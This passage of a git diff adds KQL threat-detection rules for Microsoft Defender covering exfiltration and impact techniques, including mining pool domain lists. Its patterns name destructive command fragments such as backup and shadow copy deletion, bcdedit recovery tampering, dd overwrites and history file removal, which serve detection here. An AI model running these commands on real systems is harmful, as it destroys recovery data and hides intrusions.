contains "\\\\localhost\\admin$\\") \ No newline at end of file diff --git a/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql new file mode 100644 index 00000000..cab4b0a0 --- /dev/null +++ b/KQL/rules/Exfiltration/suspicious_webdav_client_execution_via_rundll32_exe.kql @@ -0,0 +1,11 @@ +// Title: Suspicious WebDav Client Execution Via Rundll32.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) +// Date: 2023-03-16 +// Level: high +// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like C:\windows\system32\davclnt.dll,DavSetCookie. This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397 + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003, cve.2023-23397 + +DeviceProcessEvents +| where (ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and ProcessCommandLine matches regex "://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" and FolderPath endswith "\\rundll32.exe" and InitiatingProcessCommandLine contains "-s WebClient" and InitiatingProcessFolderPath endswith "\\svchost.exe") and (not((ProcessCommandLine contains "://10." or ProcessCommandLine contains "://192.168." or ProcessCommandLine contains "://172.16." or ProcessCommandLine contains "://172.17." or ProcessCommandLine contains "://172.18." or ProcessCommandLine contains "://172.19." or ProcessCommandLine contains "://172.20." or ProcessCommandLine contains "://172.21." or ProcessCommandLine contains "://172.22." or ProcessCommandLine contains "://172.23." or ProcessCommandLine contains "://172.24." or ProcessCommandLine contains "://172.25." or ProcessCommandLine contains "://172.26." or ProcessCommandLine contains "://172.27." or ProcessCommandLine contains "://172.28." or ProcessCommandLine contains "://172.29." or ProcessCommandLine contains "://172.30." or ProcessCommandLine contains "://172.31." or ProcessCommandLine contains "://127." or ProcessCommandLine contains "://169.254."))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/tap_installer_execution.kql b/KQL/rules/Exfiltration/tap_installer_execution.kql new file mode 100644 index 00000000..f9e38623 --- /dev/null +++ b/KQL/rules/Exfiltration/tap_installer_execution.kql @@ -0,0 +1,12 @@ +// Title: Tap Installer Execution +// Author: Daniil Yugoslavskiy, Ian Davis, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048 +// False Positives: +// - Legitimate OpenVPN TAP installation + +DeviceProcessEvents +| where FolderPath endswith "\\tapinstall.exe" and (not(((FolderPath contains ":\\Program Files\\Avast Software\\SecureLine VPN\\" or FolderPath contains ":\\Program Files (x86)\\Avast Software\\SecureLine VPN\\") or FolderPath contains ":\\Program Files\\OpenVPN Connect\\drivers\\tap\\" or FolderPath contains ":\\Program Files (x86)\\Proton Technologies\\ProtonVPNTap\\installer\\"))) \ No newline at end of file diff --git a/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql new file mode 100644 index 00000000..8651f814 --- /dev/null +++ b/KQL/rules/Exfiltration/webdav_client_execution_via_rundll32_exe.kql @@ -0,0 +1,12 @@ +// Title: WebDav Client Execution Via Rundll32.EXE +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". +This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server). + +// MITRE Tactic: Exfiltration +// Tags: attack.exfiltration, attack.t1048.003 + +DeviceProcessEvents +| where ProcessCommandLine contains "C:\\windows\\system32\\davclnt.dll,DavSetCookie" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\svchost.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql new file mode 100644 index 00000000..6675bce5 --- /dev/null +++ b/KQL/rules/Impact/all_backups_deleted_via_wbadmin_exe.kql @@ -0,0 +1,13 @@ +// Title: All Backups Deleted Via Wbadmin.EXE +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-12-13 +// Level: high +// Description: Detects the deletion of all backups or system state backups via "wbadmin.exe". +This technique is used by numerous ransomware families and actors. +This may only be successful on server platforms that have Windows Backup enabled. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents +| where (ProcessCommandLine contains "keepVersions:0" and (ProcessCommandLine contains "delete" and ProcessCommandLine contains "backup")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/KQL/rules/Impact/backup_files_deleted.kql b/KQL/rules/Impact/backup_files_deleted.kql new file mode 100644 index 00000000..93f9a0f6 --- /dev/null +++ b/KQL/rules/Impact/backup_files_deleted.kql @@ -0,0 +1,12 @@ +// Title: Backup Files Deleted +// Author: frack113 +// Date: 2022-01-02 +// Level: medium +// Description: Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Legitimate usage + +DeviceFileEvents +| where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wt.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe") and (FolderPath endswith ".VHD" or FolderPath endswith ".bac" or FolderPath endswith ".bak" or FolderPath endswith ".wbcat" or FolderPath endswith ".bkf" or FolderPath endswith ".set" or FolderPath endswith ".win" or FolderPath endswith ".dsk") \ No newline at end of file diff --git a/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql new file mode 100644 index 00000000..fdfe32b3 --- /dev/null +++ b/KQL/rules/Impact/boot_configuration_tampering_via_bcdedit_exe.kql @@ -0,0 +1,12 @@ +// Title: Boot Configuration Tampering Via Bcdedit.EXE +// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community +// Date: 2019-10-24 +// Level: high +// Description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains "bootstatuspolicy" and ProcessCommandLine contains "ignoreallfailures") or (ProcessCommandLine contains "recoveryenabled" and ProcessCommandLine contains "no")) and (FolderPath endswith "\\bcdedit.exe" or ProcessVersionInfoOriginalFileName =~ "bcdedit.exe") and ProcessCommandLine contains "set" \ No newline at end of file diff --git a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql new file mode 100644 index 00000000..5daf3a9e --- /dev/null +++ b/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql @@ -0,0 +1,12 @@ +// Title: Copy From VolumeShadowCopy Via Cmd.EXE +// Author: Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems) +// Date: 2021-08-09 +// Level: high +// Description: Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use) +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 +// False Positives: +// - Backup scenarios using the commandline + +DeviceProcessEvents +| where ProcessCommandLine contains "copy " and ProcessCommandLine contains "\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy" \ No newline at end of file diff --git a/KQL/rules/Impact/dd_file_overwrite.kql b/KQL/rules/Impact/dd_file_overwrite.kql new file mode 100644 index 00000000..35a093b5 --- /dev/null +++ b/KQL/rules/Impact/dd_file_overwrite.kql @@ -0,0 +1,12 @@ +// Title: DD File Overwrite +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: low +// Description: Detects potential overwriting and deletion of a file using DD. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 +// False Positives: +// - Any user deleting files that way. + +DeviceProcessEvents +| where (FolderPath in~ ("/bin/dd", "/usr/bin/dd")) and ProcessCommandLine contains "of=" and (ProcessCommandLine contains "if=/dev/zero" or ProcessCommandLine contains "if=/dev/null") \ No newline at end of file diff --git a/KQL/rules/Impact/delete_all_scheduled_tasks.kql b/KQL/rules/Impact/delete_all_scheduled_tasks.kql new file mode 100644 index 00000000..8f4881b5 --- /dev/null +++ b/KQL/rules/Impact/delete_all_scheduled_tasks.kql @@ -0,0 +1,12 @@ +// Title: Delete All Scheduled Tasks +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users. +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains " /delete " and ProcessCommandLine contains "/tn *" and ProcessCommandLine contains " /f") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/delete_important_scheduled_task.kql b/KQL/rules/Impact/delete_important_scheduled_task.kql new file mode 100644 index 00000000..2cbc5c3f --- /dev/null +++ b/KQL/rules/Impact/delete_important_scheduled_task.kql @@ -0,0 +1,12 @@ +// Title: Delete Important Scheduled Task +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-09 +// Level: high +// Description: Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/delete" and ProcessCommandLine contains "/tn") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql new file mode 100644 index 00000000..294ac0d8 --- /dev/null +++ b/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql @@ -0,0 +1,13 @@ +// Title: Deleted Data Overwritten Via Cipher.EXE +// Author: frack113 +// Date: 2021-12-26 +// Level: medium +// Description: Detects usage of the "cipher" built-in utility in order to overwrite deleted data from disk. +Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. +Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1485 + +DeviceProcessEvents +| where ProcessCommandLine contains " /w:" and (ProcessVersionInfoOriginalFileName =~ "CIPHER.EXE" or FolderPath endswith "\\cipher.exe") \ No newline at end of file diff --git a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql new file mode 100644 index 00000000..b32244be --- /dev/null +++ b/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql @@ -0,0 +1,10 @@ +// Title: Deletion of Volume Shadow Copies via WMI with PowerShell +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-20 +// Level: high +// Description: Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents +| where (ProcessCommandLine contains ".Delete()" or ProcessCommandLine contains "Remove-WmiObject" or ProcessCommandLine contains "rwmi" or ProcessCommandLine contains "Remove-CimInstance" or ProcessCommandLine contains "rcim") and (ProcessCommandLine contains "Get-WmiObject" or ProcessCommandLine contains "gwmi" or ProcessCommandLine contains "Get-CimInstance" or ProcessCommandLine contains "gcim") and ProcessCommandLine contains "Win32_ShadowCopy" \ No newline at end of file diff --git a/KQL/rules/Impact/disable_important_scheduled_task.kql b/KQL/rules/Impact/disable_important_scheduled_task.kql new file mode 100644 index 00000000..891eaadc --- /dev/null +++ b/KQL/rules/Impact/disable_important_scheduled_task.kql @@ -0,0 +1,10 @@ +// Title: Disable Important Scheduled Task +// Author: frack113, Nasreddine Bencherchali (Nextron Systems), X__Junior +// Date: 2021-12-26 +// Level: high +// Description: Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1489 + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\Windows\\BitLocker" or ProcessCommandLine contains "\\Windows\\ExploitGuard" or ProcessCommandLine contains "\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" or ProcessCommandLine contains "\\Windows\\SystemRestore\\SR" or ProcessCommandLine contains "\\Windows\\UpdateOrchestrator\\" or ProcessCommandLine contains "\\Windows\\Windows Defender\\" or ProcessCommandLine contains "\\Windows\\WindowsBackup\\" or ProcessCommandLine contains "\\Windows\\WindowsUpdate\\") and (ProcessCommandLine contains "/Change" and ProcessCommandLine contains "/TN" and ProcessCommandLine contains "/disable") and FolderPath endswith "\\schtasks.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql new file mode 100644 index 00000000..ce83ba59 --- /dev/null +++ b/KQL/rules/Impact/file_recovery_from_backup_via_wbadmin_exe.kql @@ -0,0 +1,12 @@ +// Title: File Recovery From Backup Via Wbadmin.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-05-10 +// Level: medium +// Description: Detects the recovery of files from backups via "wbadmin.exe". +Attackers can restore sensitive files such as NTDS.DIT or Registry Hives from backups in order to potentially extract credentials. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1490 + +DeviceProcessEvents +| where (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql new file mode 100644 index 00000000..54aab863 --- /dev/null +++ b/KQL/rules/Impact/group_has_been_deleted_via_groupdel.kql @@ -0,0 +1,12 @@ +// Title: Group Has Been Deleted Via Groupdel +// Author: Tuan Le (NCSGroup) +// Date: 2022-12-26 +// Level: medium +// Description: Detects execution of the "groupdel" binary. Which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1531 +// False Positives: +// - Legitimate administrator activities + +DeviceProcessEvents +| where FolderPath endswith "/groupdel" \ No newline at end of file diff --git a/KQL/rules/Impact/history_file_deletion.kql b/KQL/rules/Impact/history_file_deletion.kql new file mode 100644 index 00000000..30214a1d --- /dev/null +++ b/KQL/rules/Impact/history_file_deletion.kql @@ -0,0 +1,12 @@ +// Title: History File Deletion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-06-20 +// Level: high +// Description: Detects events in which a history file gets deleted, e.g. the ~/bash_history to remove traces of malicious activity +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1565.001 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents +| where (FolderPath endswith "/rm" or FolderPath endswith "/unlink" or FolderPath endswith "/shred") and ((ProcessCommandLine contains "/.bash_history" or ProcessCommandLine contains "/.zsh_history") or (ProcessCommandLine endswith "_history" or ProcessCommandLine endswith ".history" or ProcessCommandLine endswith "zhistory")) \ No newline at end of file diff --git a/KQL/rules/Impact/linux_crypto_mining_indicators.kql b/KQL/rules/Impact/linux_crypto_mining_indicators.kql new file mode 100644 index 00000000..810b845f --- /dev/null +++ b/KQL/rules/Impact/linux_crypto_mining_indicators.kql @@ -0,0 +1,12 @@ +// Title: Linux Crypto Mining Indicators +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects command line parameters or strings often used by crypto miners +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Legitimate use of crypto miners + +DeviceProcessEvents +| where ProcessCommandLine contains " --cpu-priority=" or ProcessCommandLine contains "--donate-level=0" or ProcessCommandLine contains " -o pool." or ProcessCommandLine contains " --nicehash" or ProcessCommandLine contains " --algo=rx/0 " or ProcessCommandLine contains "stratum+tcp://" or ProcessCommandLine contains "stratum+udp://" or ProcessCommandLine contains "sh -c /sbin/modprobe msr allow_writes=on" or ProcessCommandLine contains "LS1kb25hdGUtbGV2ZWw9" or ProcessCommandLine contains "0tZG9uYXRlLWxldmVsP" or ProcessCommandLine contains "tLWRvbmF0ZS1sZXZlbD" or ProcessCommandLine contains "c3RyYXR1bSt0Y3A6Ly" or ProcessCommandLine contains "N0cmF0dW0rdGNwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3RjcDovL" or ProcessCommandLine contains "c3RyYXR1bSt1ZHA6Ly" or ProcessCommandLine contains "N0cmF0dW0rdWRwOi8v" or ProcessCommandLine contains "zdHJhdHVtK3VkcDovL" \ No newline at end of file diff --git a/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql new file mode 100644 index 00000000..78adb04d --- /dev/null +++ b/KQL/rules/Impact/linux_crypto_mining_pool_connections.kql @@ -0,0 +1,12 @@ +// Title: Linux Crypto Mining Pool Connections +// Author: Florian Roth (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects process connections to a Monero crypto mining pool +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Legitimate use of crypto miners + +DeviceNetworkEvents +| where RemoteUrl in~ ("pool.minexmr.com", "fr.minexmr.com", "de.minexmr.com", "sg.minexmr.com", "ca.minexmr.com", "us-west.minexmr.com", "pool.supportxmr.com", "mine.c3pool.com", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-asia1.nanopool.org", "xmr-jp1.nanopool.org", "xmr-au1.nanopool.org", "xmr.2miners.com", "xmr.hashcity.org", "xmr.f2pool.com", "xmrpool.eu", "pool.hashvault.pro", "moneroocean.stream", "monerocean.stream") \ No newline at end of file diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql new file mode 100644 index 00000000..4fc05097 --- /dev/null +++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_a_suspicious_process.kql @@ -0,0 +1,15 @@ +// Title: Load Of RstrtMgr.DLL By A Suspicious Process +// Author: Luc Génaux +// Date: 2023-11-28 +// Level: high +// Description: Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. +This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +It could also be used for anti-analysis purposes by shut downing specific processes. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 +// False Positives: +// - Processes related to software installation + +DeviceImageLoadEvents +| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\"))) \ No newline at end of file diff --git a/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql new file mode 100644 index 00000000..cbe9deb4 --- /dev/null +++ b/KQL/rules/Impact/load_of_rstrtmgr_dll_by_an_uncommon_process.kql @@ -0,0 +1,16 @@ +// Title: Load Of RstrtMgr.DLL By An Uncommon Process +// Author: Luc Génaux +// Date: 2023-11-28 +// Level: low +// Description: Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. +This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. +It could also be used for anti-analysis purposes by shut downing specific processes. + +// MITRE Tactic: Impact +// Tags: attack.impact, attack.defense-evasion, attack.t1486, attack.t1562.001 +// False Positives: +// - Other legitimate Windows processes not currently listed +// - Processes related to software installation + +DeviceImageLoadEvents +| where (FolderPath endswith "\\RstrtMgr.dll" or InitiatingProcessVersionInfoOriginalFileName =~ "RstrtMgr.dll") and (not((InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or (InitiatingProcessFolderPath contains ":\\$WINDOWS.~BT\\" or InitiatingProcessFolderPath contains ":\\$WinREAgent\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\" or InitiatingProcessFolderPath contains ":\\Program Files\\" or InitiatingProcessFolderPath contains ":\\ProgramData\\" or InitiatingProcessFolderPath contains ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath contains ":\\Windows\\SoftwareDistribution\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysNative\\" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\" or InitiatingProcessFolderPath contains ":\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath contains ":\\Windows\\WinSxS\\" or InitiatingProcessFolderPath contains ":\\WUDownloadCache\\") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Temp\\is-" and InitiatingProcessFolderPath contains ".tmp\\") and InitiatingProcessFolderPath endswith ".tmp")))) \ No newline at end of file diff --git a/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql new file mode 100644 index 00000000..b0645f1b --- /dev/null +++ b/KQL/rules/Impact/network_communication_with_crypto_mining_pool.kql @@ -0,0 +1,12 @@ +// Title: Network Communication With Crypto Mining Pool +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-10-26 +// Level: high +// Description: Detects initiated network connections to crypto mining pools +// MITRE Tactic: Impact +// Tags: attack.impact, attack.t1496 +// False Positives: +// - Unlikely + +DeviceNetworkEvents +| where RemoteUrl in~ ("alimabi.cn", "ap.luckpool.net", "bcn.pool.minergate.com", "bcn.vip.pool.minergate.com", "bohemianpool.com", "ca-aipg.miningocean.org", "ca-dynex.miningocean.org", "ca-neurai.miningocean.org", "ca-qrl.miningocean.org", "ca-upx.miningocean.org", "ca-zephyr.miningocean.org", "ca.minexmr.com", "ca.monero.herominers.com", "cbd.monerpool.org", "cbdv2.monerpool.org", "cryptmonero.com", "crypto-pool.fr", "crypto-pool.info", "cryptonight-hub.miningpoolhub.com", "d1pool.ddns.net", "d5pool.us", "daili01.monerpool.org", "de-aipg.miningocean.org", "de-dynex.miningocean.org", "de-zephyr.miningocean.org", "de.minexmr.com", "dl.nbminer.com", "donate.graef.in", "donate.ssl.xmrig.com", "donate.v2.xmrig.com", "donate.xmrig.com", "donate2.graef.in", "drill.moneroworld.com", "dwarfpool.com", "emercoin.com", "emercoin.net", "emergate.net", "ethereumpool.co", "eu.luckpool.net", "eu.minerpool.pw", "fcn-xmr.pool.minergate.com", "fee.xmrig.com", "fr-aipg.miningocean.org", "fr-dynex.miningocean.org", "fr-neurai.miningocean.org", "fr-qrl.miningocean.org", "fr-upx.miningocean.org", "fr-zephyr.miningocean.org", "fr.minexmr.com", "hellominer.com", "herominers.com", "hk-aipg.miningocean.org", "hk-dynex.miningocean.org", "hk-neurai.miningocean.org", "hk-qrl.miningocean.org", "hk-upx.miningocean.org", "hk-zephyr.miningocean.org", "huadong1-aeon.ppxxmr.com", "iwanttoearn.money", "jw-js1.ppxxmr.com", "koto-pool.work", "lhr.nbminer.com", "lhr3.nbminer.com", "linux.monerpool.org", "lokiturtle.herominers.com", "luckpool.net", "masari.miner.rocks", "mine.c3pool.com", "mine.moneropool.com", "mine.ppxxmr.com", "mine.zpool.ca", "mine1.ppxxmr.com", "minemonero.gq", "miner.ppxxmr.com", "miner.rocks", "minercircle.com", "minergate.com", "minerpool.pw", "minerrocks.com", "miners.pro", "minerxmr.ru", "minexmr.cn", "minexmr.com", "mining-help.ru", "miningpoolhub.com", "mixpools.org", "moner.monerpool.org", "moner1min.monerpool.org", "monero-master.crypto-pool.fr", "monero.crypto-pool.fr", "monero.hashvault.pro", "monero.herominers.com", "monero.lindon-pool.win", "monero.miners.pro", "monero.riefly.id", "monero.us.to", "monerocean.stream", "monerogb.com", "monerohash.com", "moneroocean.stream", "moneropool.com", "moneropool.nl", "monerorx.com", "monerpool.org", "moriaxmr.com", "mro.pool.minergate.com", "multipool.us", "myxmr.pw", "na.luckpool.net", "nanopool.org", "nbminer.com", "node3.luckpool.net", "noobxmr.com", "pangolinminer.comgandalph3000.com", "pool.4i7i.com", "pool.armornetwork.org", "pool.cortins.tk", "pool.gntl.co.uk", "pool.hashvault.pro", "pool.minergate.com", "pool.minexmr.com", "pool.monero.hashvault.pro", "pool.ppxxmr.com", "pool.somec.cc", "pool.support", "pool.supportxmr.com", "pool.usa-138.com", "pool.xmr.pt", "pool.xmrfast.com", "pool2.armornetwork.org", "poolchange.ppxxmr.com", "pooldd.com", "poolmining.org", "poolto.be", "ppxvip1.ppxxmr.com", "ppxxmr.com", "prohash.net", "r.twotouchauthentication.online", "randomx.xmrig.com", "ratchetmining.com", "seed.emercoin.com", "seed.emercoin.net", "seed.emergate.net", "seed1.joulecoin.org", "seed2.joulecoin.org", "seed3.joulecoin.org", "seed4.joulecoin.org", "seed5.joulecoin.org", "seed6.joulecoin.org", "seed7.joulecoin.org", "seed8.joulecoin.org", "sg-aipg.miningocean.org", "sg-dynex.miningocean.org", "sg-neurai.miningocean.org", "sg-qrl.miningocean.org", "sg-upx.miningocean.org", "sg-zephyr.miningocean.org", "sg.minexmr.com", "sheepman.mine.bz", "siamining.com", "sumokoin.minerrocks.com", "supportxmr.com", "suprnova.cc", "teracycle.net", "trtl.cnpool.cc", "trtl.pool.mine2gether.com", "turtle.miner.rocks", "us-aipg.miningocean.org", "us-dynex.miningocean.org", "us-neurai.miningocean.org", "us-west.minexmr.com", "us-zephyr.miningocean.org", "usxmrpool.com", "viaxmr.com", "webservicepag.webhop.net", "xiazai.monerpool.org", "xiazai1.monerpool.org", "xmc.pool.minergate.com", "xmo.pool.minergate.com", "xmr-asia1.nanopool.org", "xmr-au1.nanopool.org", "xmr-eu1.nanopool.org", "xmr-eu2.nanopool.org", "xmr-jp1.nanopool.org", "xmr-us-east1.nanopool.org", "xmr-us-west1.nanopool.org", "xmr-us.suprnova.cc", "xmr-usa.dwarfpool.com", "xmr.2miners.com", "xmr.5b6b7b.ru", "xmr.alimabi.cn", "xmr.bohemianpool.com", "xmr.crypto-pool.fr", "xmr.crypto-pool.info", "xmr.f2pool.com", "xmr.hashcity.org", "xmr.hex7e4.ru", "xmr.ip28.net", "xmr.monerpool.org", "xmr.mypool.online", "xmr.nanopool.org", "xmr.pool.gntl.co.uk", "xmr.pool.minergate.com", "xmr.poolto.be", "xmr.ppxxmr.com", "xmr.prohash.net", "xmr.simka.pw", "xmr.somec.cc", "xmr.suprnova.cc", "xmr.usa-138.com", "xmr.vip.pool.minergate.com", "xmr1min.monerpool.org", "xmrf.520fjh.org", "xmrf.fjhan.club", "xmrfast.com", "xmrigcc.graef.in", "xmrminer.cc", "xmrpool.de", "xmrpool.eu", "xmrpool.me", "xmrpool.net", "xmrpool.xyz", "xx11m.monerpool.org", "xx11mv2.monerpool.org", "xxx.hex7e4.ru", "zarabotaibitok.ru", "zer0day.ru") \ No newline at end of file diff --git a/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql new file mode 100644 index 00000000..378dc483 --- /dev/null +++ b/KQL/rules/Impact/new_file_exclusion_added_to_time_machine_via_tmutil_macos.kql @@ -0,0 +1,14 @@ +// Title: New File Exclusion Added To Time Machine Via Tmutil - MacOS +// Author: Pratinav Chandra +// Date: 2024-05-29 +// Level: medium +// Description: Detects the addition of a new file or path exclusion to MacOS Time Machine via the "tmutil" utility. +An adversary could exclude a path from Time Machine backups to prevent certain files from 